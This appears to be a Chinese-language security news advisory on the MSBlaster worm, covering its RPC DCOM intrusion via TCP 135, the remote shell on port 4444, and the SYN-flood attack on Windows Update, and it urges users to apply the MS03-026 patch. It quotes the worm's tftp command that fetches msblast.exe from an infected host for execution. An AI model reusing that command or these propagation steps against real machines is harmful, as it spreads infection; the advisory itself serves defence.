新蠕虫8月16日开始攻击微软更新站点

新蠕虫8月16日开始攻击微软更新站点

AMTeam.org消息：美国当地时间8月11日，全球网络安全组织和各网络安全产品供应商警告称：“MSBLASTER（Blaster，MSBLAST，RPC DCOM WORM）”蠕虫将通过恶意使用Windows安全漏洞传播感染。该蠕虫不仅会恶意使用安全漏洞自动入侵，而且在8月16日以后，还将对微软的“Windows Update”站点（windowsupdate.com）进行DoS（拒绝服务）攻击。据悉，怀疑由蠕虫引起的对TCP 135端口的访问目前正在不断增加。建议用户再次确认是否采取了充分措施。

该蠕虫试图访问并入侵根据某种算法选择的IP地址所对应的机器的TCP 135端口。一旦恶意使用安全漏洞成功入侵，就会在被攻击的机器上起动系统外壳。外壳等待通过TCP 4444端口实施的外部访问。

其次，该蠕虫还会在这个外壳上运行tftp命令，通过被感染的机器复制蠕虫主体“msblast.exe”。具体来说就是运行“tftp〈被感染机器〉GET msblast.exe”。被感染机器中，蠕虫会预先起动tftp服务器。接着在复制msblast.exe后，在感染对象机器上运行msblast.exe。

msblast.exe是利用“UPX”压缩软件以自解压形式压缩的文件。压缩后的尺寸大概为6kB，解压后的尺寸为11kB。

msblast.exe运行后，蠕虫就会在机器上起动，并向其他机器传播感染。而且，系统日期一旦到了8月16日以后，将会对“Windows Update”站点实施名为“SYN Flooding”的DoS攻击。此时，蠕虫会冒充攻击方（蠕虫运行的机器）的IP地址。

SYN Flooding是指恶意使用TCP“建立连接”步骤的DoS攻击。这种攻击是指通过发送大量SYN分组信息，完全占用接收连接请求的缓存区，从而使系统无法接收来自其他机器的连接请求。

另外，该蠕虫还能改变注册表，以图重新起动机器后运行蠕虫。

建议用户再次确认已经正确安装了“RPC接口未经检测的缓存溢出有可能导致执行任意代码（823980）（MS03-026）”的补丁程序，以及严格关闭了包括TCP 135端口在内的“危险端口”。